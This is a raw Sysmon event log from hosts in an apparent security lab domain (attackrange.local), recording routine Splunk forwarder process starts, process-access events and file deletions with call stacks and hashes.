9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.550{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45965F2B70FFA4690D52C82E9EE36A9A,SHA256=3EB2956ABEBD5F4023476B08AC340A997AF1ADBA99B067AF58C0E2CEDB203253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D56480BC466A5AB86C9DC6C25702D12E,SHA256=7631F43EAFFA9992E0E2EA03B512F697E513A8880965330D84A7C524CCE4EED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B23052D07BD459051FD89300488674,SHA256=979A7B4BBE20137AEC0F80BBC66E390497C20F1A9C34AAD96425FD800A96E21C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:26.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4549F4E5440BD13DAB159A16101690FC,SHA256=27B7A57352D5D35228442EB91D1395479989E4C6FBEBEE47B5B1B96D1C657310,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.923{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF92714F3C1BE31C8776DFA5A9FBA04,SHA256=1313BF215295A69FC2F5BBCAD8B6BB7B01BDFDD3D08F3D52304C743ADDB11EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45965F2B70FFA4690D52C82E9EE36A9A,SHA256=3EB2956ABEBD5F4023476B08AC340A997AF1ADBA99B067AF58C0E2CEDB203253,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 